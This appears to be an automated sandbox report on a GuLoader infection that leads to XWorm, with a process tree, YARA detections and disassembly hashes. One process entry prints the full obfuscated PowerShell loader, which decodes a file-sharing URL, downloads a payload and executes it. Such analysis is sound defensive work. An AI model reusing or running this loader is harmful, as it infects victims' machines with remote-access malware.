                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:12:25:11
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
                                                                          Imagebase:0x7ff712150000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:12:25:26
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
                                                                          Imagebase:0xa10000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1960362593.0000000008BB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1952620099.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.1960677789.000000000A947000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:12:25:27
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:12:25:48
                                                                          Start date:23/05/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                          Imagebase:0xf70000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2662796523.0000000005827000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Executed Functions

                                                                            Function 00007FFB4B1DC856 Relevance: .5, Instructions: 473COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2162996441.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b1d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f2eff42de9d96426afc39ba88b8042b5094f765c068425bfe595ed210544675
                                                                            • Instruction ID: 623dbf55969a47e4be9c488734b471a9f5d2328f400823c03463ef653e674f35
                                                                            • Opcode Fuzzy Hash: 8f2eff42de9d96426afc39ba88b8042b5094f765c068425bfe595ed210544675
                                                                            • Instruction Fuzzy Hash: 79F1C47051CA8D8FEBA9EF28C8557E937D1FF54310F04866EE84DC7295DB34A8418B82
                                                                            Function 00007FFB4B1DD602 Relevance: .5, Instructions: 459COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2162996441.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b1d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c855c1313b9bf17cc5de89da7ad256a71665ee749876c051f71db92fc93ccbe
                                                                            • Instruction ID: 848e90d0498456bbd1467a09042d4f9f04c6b2a8d28d073190ad902e1fdefd07
                                                                            • Opcode Fuzzy Hash: 4c855c1313b9bf17cc5de89da7ad256a71665ee749876c051f71db92fc93ccbe
                                                                            • Instruction Fuzzy Hash: 9FE1C27091CA8E8FEBA9EF28C8557E937D1EF54314F14826ED84DC72A1DE74A8418B81
                                                                            Function 00007FFB4B2A9C09 Relevance: 6.7, Strings: 5, Instructions: 469COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2163902251.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p"AK$p"AK$p"AK$p"AK$p"AK
                                                                            • API String ID: 0-3314940521
                                                                            • Opcode ID: ae86cd304fadf7c44dd7884f5be6ef810a6a05f056163b6a5c4911534d2f8394
                                                                            • Instruction ID: 8c1796779f199a26447050e91a44c61bb90f9b69e95a85f824023a5c157f0ffb
                                                                            • Opcode Fuzzy Hash: ae86cd304fadf7c44dd7884f5be6ef810a6a05f056163b6a5c4911534d2f8394
                                                                            • Instruction Fuzzy Hash: 1FE113B290DA9A4FE799FFB8C8552B87FD1EF69310F0841BAD54DC31E2CA18A8458741
                                                                            Function 00007FFB4B2A9DA7 Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2163902251.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p"AK$p"AK$p"AK
                                                                            • API String ID: 0-1344769460
                                                                            • Opcode ID: a49fb53dc694fd8fc380c51c87c0cf387a30e6471acf31b9642dff8cf0be1e42
                                                                            • Instruction ID: 371d85d7ec902b3c7a4577033f57c91eed3e8d14045b4b626cd324a5972d06be
                                                                            • Opcode Fuzzy Hash: a49fb53dc694fd8fc380c51c87c0cf387a30e6471acf31b9642dff8cf0be1e42
                                                                            • Instruction Fuzzy Hash: 75415AA2E1DA960FE799FFBCC9502B8BAC2EF68310F4841B9D54CC31E3DD18A8458741
                                                                            Function 00007FFB4B2AA01B Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2163902251.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p"AK
                                                                            • API String ID: 0-2044595026
                                                                            • Opcode ID: 977fb592e597fbf6f3edb19aad5b897bd340d87ebff53f9475a36be92f033b82
                                                                            • Instruction ID: 4dff00b22a431643d174bc262af235c258c2b37fb93c269be654fbca5e2bb45b
                                                                            • Opcode Fuzzy Hash: 977fb592e597fbf6f3edb19aad5b897bd340d87ebff53f9475a36be92f033b82
                                                                            • Instruction Fuzzy Hash: A3C126A190DBC96FD792BF7888542A57FE0EF5B214F0841FBD58CC70A3EA18590AC352
                                                                            Function 00007FFB4B2A4A7A Relevance: .5, Instructions: 451COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2163902251.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1706bd6e434626ed353e0605031e6182df4272b9d97c163dc70232473480ceac
                                                                            • Instruction ID: 5d7df95f516b7406bcec125323642c4f86bef54907ba05deef84665909c01119
                                                                            • Opcode Fuzzy Hash: 1706bd6e434626ed353e0605031e6182df4272b9d97c163dc70232473480ceac
                                                                            • Instruction Fuzzy Hash: 4FD134A290EE894FE7A6BF7CC8151B5BFD1EF49210B0801FAD55CC74E3DA18E8058391
                                                                            Function 00007FFB4B1D3945 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2162996441.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b1d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction ID: 318d644b31a13b90276b31929eb2fbcd2b3ee1aa12912a509744bd97796a544c
                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction Fuzzy Hash: 7D01677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D636E882CB45

                                                                            Non-executed Functions

                                                                            Function 00007FFB4B1D4CFA Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2162996441.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b1d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ^
                                                                            • API String ID: 0-1590793086
                                                                            • Opcode ID: 8765db5ad8af55fe970a994c09e6f1813a06c2834fdf427d03ed1000cc3b75f8
                                                                            • Instruction ID: e21d5dba14f913d57e8954f17b7e0654f1ba1e39059333c7239f539aa2d74d67
                                                                            • Opcode Fuzzy Hash: 8765db5ad8af55fe970a994c09e6f1813a06c2834fdf427d03ed1000cc3b75f8
                                                                            • Instruction Fuzzy Hash: 5D91F9C7D1DBD21AF7536E3C99A50E52F94EF63228B4982FBC5C4870E3D90D35068691
                                                                            Function 00007FFB4B1D84F2 Relevance: 12.8, Strings: 10, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2162996441.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7ffb4b1d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                            • API String ID: 0-3378862611
                                                                            • Opcode ID: 35a77d6bc981bc9009d05673ccb054b9285fe2acc824524064e9f07d2d738276
                                                                            • Instruction ID: 1bf1ec4181ee533ae3ecb3e3b1c5c27f840b41a0e1db26667454c9dc444d34c2
                                                                            • Opcode Fuzzy Hash: 35a77d6bc981bc9009d05673ccb054b9285fe2acc824524064e9f07d2d738276
                                                                            • Instruction Fuzzy Hash: A191B1E791DAD64BE3125E6D89A90A47FE4FF6222874983F7C1D8870E3FD1538078A41

                                                                            Executed Functions

                                                                            Function 04BECC30 Relevance: 6.8, Strings: 5, Instructions: 521COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8N~k$h]~k$h]~k$h]~k$I~k
                                                                            • API String ID: 0-2160774258
                                                                            • Opcode ID: ab7a2ac74722c03e2171a2709cae2119035fda83dac228493d34a85b2e17f197
                                                                            • Instruction ID: cc79775f54d348c9302fcb7b6780e6431e40e396506f4a9ec5df04f87d0a9829
                                                                            • Opcode Fuzzy Hash: ab7a2ac74722c03e2171a2709cae2119035fda83dac228493d34a85b2e17f197
                                                                            • Instruction Fuzzy Hash: 70227034B002158FDB25EB29C8546AEBBB6EFC9305F1484E9D40AAB351CB75ED42CF91
                                                                            Function 04BED8E8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1946596153.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4be0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h]~k$I~k
                                                                            • API String ID: 0-3445786750
                                                                            • Opcode ID: 8234a1fca7202381f8cee8297500bc6df2fe21b97eb9e04dbb66b07bfa277c81
                                                                            • Instruction ID: 650272243081abdaa5c57e7c456ad1848ecba327cb69f8d5417f98d3b5b512b6
                                                                            • Opcode Fuzzy Hash: 8234a1fca7202381f8cee8297500bc6df2fe21b97eb9e04dbb66b07bfa277c81
                                                                            • Instruction Fuzzy Hash: AA314034B011198FCF25EB68C8906EEB7B6AF89304F1044E9D509AB351CB75DE86CF91
                                                                            Function 07867C58 Relevance: 1.0, Instructions: 1039COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9909f1bd03910400ad21e4be3c1460496d23eb0c8e31efbf218644896b34d962
                                                                            • Instruction ID: 4351e941d682b3df727ad55fca4364fc159ac8c8e493e56e144eb38ca1102873
                                                                            • Opcode Fuzzy Hash: 9909f1bd03910400ad21e4be3c1460496d23eb0c8e31efbf218644896b34d962
                                                                            • Instruction Fuzzy Hash: 16828CB4B002059FEB14DF98C448B6ABBB2AF86318F14C069D909EF355DB72EC45CB91
                                                                            Function 07868B48 Relevance: .8, Instructions: 768COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6fc010f92f7c7c5a5bea626810b816041b32ad05129c12ab1bfdf0492c66b28e
                                                                            • Instruction ID: b2405375c37d65dac9f276fe5eab90c2ed7a01523adc1336ba5300b1f92c7c4d
                                                                            • Opcode Fuzzy Hash: 6fc010f92f7c7c5a5bea626810b816041b32ad05129c12ab1bfdf0492c66b28e
                                                                            • Instruction Fuzzy Hash: F76271B0A00319DFEB24DF58C854B6EBBB2AF85314F10C4A9D909AB395CB75ED41CB91
                                                                            Function 0786E00D Relevance: .7, Instructions: 704COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b9c21113ab9abe1982be18a5b1c6859372d68f2001705e3f188f3a813954eb82
                                                                            • Instruction ID: 9c3811c387182c2df9e6b37b0e449fdcbfc1a392d55ca0070fc1850b39b04766
                                                                            • Opcode Fuzzy Hash: b9c21113ab9abe1982be18a5b1c6859372d68f2001705e3f188f3a813954eb82
                                                                            • Instruction Fuzzy Hash: 6B625E74A102189FEB24DF54C954B9EB7B2BB85308F5080E5DA09AF395CB35EE81CF91
                                                                            Function 078629A8 Relevance: .6, Instructions: 586COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68ec1ec1b7d48590819e3df6d9459d854cac495f05b34352e055d0afa6982116
                                                                            • Instruction ID: 9c46b2bd3cc0c9bd4cdbec75f92bd590192f1c3171ee0477fbb473bce6edd1c7
                                                                            • Opcode Fuzzy Hash: 68ec1ec1b7d48590819e3df6d9459d854cac495f05b34352e055d0afa6982116
                                                                            • Instruction Fuzzy Hash: CE1279B1B04356AFDB259F28881876A7BA2BFD6315F1480FAD905CF352DB35C842C791
                                                                            Function 07868000 Relevance: .6, Instructions: 555COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c347b3085487650d8ef9e910279a3c1e89b5da1bf9dd06be7f08bfbff9d9ebe
                                                                            • Instruction ID: f69b87a9b82b857c18baf349447e5ae709236b778fb3d6542dbd5a26a5c53694
                                                                            • Opcode Fuzzy Hash: 9c347b3085487650d8ef9e910279a3c1e89b5da1bf9dd06be7f08bfbff9d9ebe
                                                                            • Instruction Fuzzy Hash: 03326DB4A00205DFEB14CF98C589E99BBB2BF85318F14C199D909AF366CB72ED45CB41
                                                                            Function 07865988 Relevance: .5, Instructions: 534COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.1955701819.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7860000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ec2190bcc48a1ffc38a906b082c7aa88e717efaf02e365982e154b781e0babb
